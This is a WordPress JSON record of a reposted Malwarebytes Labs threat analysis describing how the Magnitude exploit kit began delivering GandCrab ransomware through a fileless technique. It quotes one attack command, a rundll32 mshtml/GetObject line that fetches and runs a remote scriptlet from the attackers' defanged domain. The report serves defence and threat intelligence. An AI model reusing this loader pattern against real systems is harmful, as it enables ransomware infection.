{"id":12043,"date":"2018-04-17T10:10:08","date_gmt":"2018-04-17T18:10:08","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/04\/17\/news-5812\/"},"modified":"2018-04-17T10:10:08","modified_gmt":"2018-04-17T18:10:08","slug":"news-5812","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/04\/17\/news-5812\/","title":{"rendered":"Magnitude exploit kit switches to GandCrab ransomware"},"content":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Tue, 17 Apr 2018 16:58:26 +0000<\/strong><\/p>\n<p>The GandCrab ransomware is reaching far and wide via <a href=\"https:\/\/twitter.com\/executemalware\/status\/986070506351755264\" target=\"_blank\" rel=\"noopener\">malspam<\/a>, <a href=\"https:\/\/twitter.com\/nao_sec\/status\/984099138445852672\" target=\"_blank\" rel=\"noopener\">social engineering schemes<\/a>, and <a href=\"https:\/\/twitter.com\/malware_traffic\/status\/985258567291883521\" target=\"_blank\" rel=\"noopener\">exploit kit campaigns<\/a>. On April 16, we discovered that Magnitude EK, which\u00a0had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.<\/p>\n<p>While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from <a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/10\/magniber-ransomware-exclusively-for-south-koreans\/\" target=\"_blank\" rel=\"noopener\">Magniber<\/a>, which was extremely thorough at avoiding other geolocations.<\/p>\n<p>Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect.\u00a0The variations of this technique have been <a href=\"http:\/\/www.kernelmode.info\/forum\/viewtopic.php?f=16&amp;t=3377\" target=\"_blank\" rel=\"noopener\">known for several years<\/a>\u00a0and used by other families such as by Poweliks, but they are a new addition to Magnitude.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Mag_Crab.png\" data-rel=\"lightbox-0\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"23272\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/attachment\/mag_crab\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Mag_Crab.png\" data-orig-size=\"800,575\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Mag_Crab\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Mag_Crab-300x216.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Mag_Crab-600x431.png\" class=\"size-full wp-image-23272 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Mag_Crab.png\" alt=\"\" width=\"800\" height=\"575\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Mag_Crab.png 800w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Mag_Crab-300x216.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Mag_Crab-600x431.png 600w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 1: Magnitude EK traffic capture with the GandCrab payload<\/em><\/p>\n<p>Magnitude has always experimented with unconventional ways to load its malware, for example via <a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/cerber-ransomware-delivered-format-different-order-magnitude\/\" target=\"_blank\" rel=\"noopener\">binary padding<\/a>, or more recently via <a href=\"https:\/\/twitter.com\/kafeine\/status\/980505556715786242\" target=\"_blank\" rel=\"noopener\">another technique<\/a>, but still exposing it &#8220;in the clear&#8221; from traffic or network packet capture.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/WSH_injection_.png\" data-rel=\"lightbox-1\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"23271\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/attachment\/wsh_injection_\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/WSH_injection_.png\" data-orig-size=\"719,1108\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"WSH_injection_\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/WSH_injection_-195x300.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/WSH_injection_-389x600.png\" class=\"size-full wp-image-23271 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/WSH_injection_.png\" alt=\"\" width=\"719\" height=\"1108\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/WSH_injection_.png 719w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/WSH_injection_-195x300.png 195w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/WSH_injection_-389x600.png 389w\" sizes=\"auto, (max-width: 719px) 100vw, 719px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 2: Magnitude EK dropping Magniber\u00a0on April 4, 2018<\/em><\/p>\n<p>The payload is encoded (using VBScript.Encode\/JScript.Encode) and embedded in a scriplet that is later decoded in memory and executed.<\/p>\n<pre><span style=\"font-weight: 400\">\"C:WindowsSystem32rundll32.exe\" javascript:\"..mshtml,RunHTMLApplication \";  document.write();GetObject('script:http:\/\/dx30z30a4t11l7be.lieslow[.]faith\/5aad4b91a0da20d4faab0991bdbe7138')<\/span><\/pre>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/encoded_payload.png\" data-rel=\"lightbox-2\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"23263\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/attachment\/encoded_payload\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/encoded_payload.png\" data-orig-size=\"692,690\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"encoded_payload\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/encoded_payload-300x300.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/encoded_payload-600x598.png\" class=\"size-full wp-image-23263 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/encoded_payload.png\" alt=\"\" width=\"692\" height=\"690\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/encoded_payload.png 692w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/encoded_payload-150x150.png 150w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/encoded_payload-300x300.png 300w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/encoded_payload-600x598.png 600w\" sizes=\"auto, (max-width: 692px) 100vw, 692px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 3: Innocuous scriptlet hides the payload<\/em><\/p>\n<p>After the payload is injected into <em>explorer.exe<\/em>, it\u00a0immediately attempts to reboot the machine. If we suspend that process and use <a href=\"https:\/\/twitter.com\/hasherezade\" target=\"_blank\" rel=\"noopener\">@hasherezade<\/a>&#8216;s <a href=\"https:\/\/github.com\/hasherezade\/pe-sieve\" target=\"_blank\" rel=\"noopener\">PE-Sieve<\/a>, we can actually dump the GandCrab DLL from memory:<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Dumped_payload.png\" data-rel=\"lightbox-3\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"23274\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/attachment\/dumped_payload\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Dumped_payload.png\" data-orig-size=\"447,316\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"Dumped_payload\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Dumped_payload-300x212.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Dumped_payload.png\" class=\"size-full wp-image-23274 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Dumped_payload.png\" alt=\"\" width=\"447\" height=\"316\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Dumped_payload.png 447w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/Dumped_payload-300x212.png 300w\" sizes=\"auto, (max-width: 447px) 100vw, 447px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 4: Extracting the payload from memory using PE-Sieve<\/em><\/p>\n<p>Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/note.png\" data-rel=\"lightbox-4\" title=\"\"><img loading=\"lazy\" decoding=\"async\" data-attachment-id=\"23267\" data-permalink=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/attachment\/note-3\/\" data-orig-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/note.png\" data-orig-size=\"709,724\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"note\" data-image-description=\"\" data-medium-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/note-294x300.png\" data-large-file=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/note-588x600.png\" class=\"size-full wp-image-23267 aligncenter\" src=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/note.png\" alt=\"\" width=\"709\" height=\"724\" srcset=\"https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/note.png 709w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/note-294x300.png 294w, https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/note-588x600.png 588w\" sizes=\"auto, (max-width: 709px) 100vw, 709px\" \/><\/a><\/p>\n<p style=\"text-align: center\"><em>Figure 5: GandCrab&#8217;s ransom note<\/em><\/p>\n<p>A recent <a href=\"https:\/\/www.europol.europa.eu\/newsroom\/news\/free-data-recovery-kit-for-victims-of-gandcrab-ransomware-now-available-no-more-ransom\" target=\"_blank\" rel=\"noopener\">law enforcement operation<\/a> provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.<\/p>\n<p><a href=\"https:\/\/www.malwarebytes.com\/\" target=\"_blank\" rel=\"noopener\">Malwarebytes<\/a> users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.<\/p>\n<p>Time will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.<\/p>\n<h3>Indicators of compromise<\/h3>\n<p>Dumped GandCrab DLL<\/p>\n<pre>9daf74238f0f7d0e64f8bb046c136d7e61346b4c084a0c46e174a2b76f30b57a<\/pre>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/\">Magnitude exploit kit switches to GandCrab ransomware<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: J\u00e9r\u00f4me Segura| Date: Tue, 17 Apr 2018 16:58:26 +0000<\/strong><\/p>\n<table cellpadding='10'>\n<tr>\n<td valign='top' align='center'><a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/' title='Magnitude exploit kit switches to GandCrab ransomware'><img src='https:\/\/blog.malwarebytes.com\/wp-content\/uploads\/2018\/04\/photo-900x506.jpg' border='0'  width='300px'  \/><\/a><\/td>\n<\/tr>\n<tr>\n<td valign='top' align='left'>After being faithful to its own Magniber ransomware for several months, Magnitude EK joins others to adopt GandCrab.<\/p>\n<p>Categories: <\/p>\n<ul class=\"post-categories\">\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/exploits-threat-analysis\/\" rel=\"category tag\">Exploits<\/a><\/li>\n<li><a href=\"https:\/\/blog.malwarebytes.com\/category\/threat-analysis\/\" rel=\"category tag\">Threat analysis<\/a><\/li>\n<\/ul>\n<p>Tags: <a href=\"https:\/\/blog.malwarebytes.com\/tag\/ek\/\" rel=\"tag\">EK<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/exploit-kit\/\" rel=\"tag\">exploit kit<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/gandcrab\/\" rel=\"tag\">gandcrab<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/magnitude\/\" rel=\"tag\">Magnitude<\/a><a href=\"https:\/\/blog.malwarebytes.com\/tag\/ransomware\/\" rel=\"tag\">ransomware<\/a><\/p>\n<table width='100%'>\n<tr>\n<td align=right>\n<p><b>(<a href='https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/' title='Magnitude exploit kit switches to GandCrab ransomware'>Read more&#8230;<\/a>)<\/b><\/p>\n<\/td>\n<\/tr>\n<\/table>\n<\/td>\n<\/tr>\n<\/table>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-analysis\/2018\/04\/magnitude-exploit-kit-switches-gandcrab-ransomware\/\">Magnitude exploit kit switches to GandCrab ransomware<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[10527,10534,10987,17363,7871,3765,10494],"class_list":["post-12043","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-ek","tag-exploit-kit","tag-exploits","tag-gandcrab","tag-magnitude","tag-ransomware","tag-threat-analysis"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12043","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=12043"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/12043\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=12043"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=12043"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=12043"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}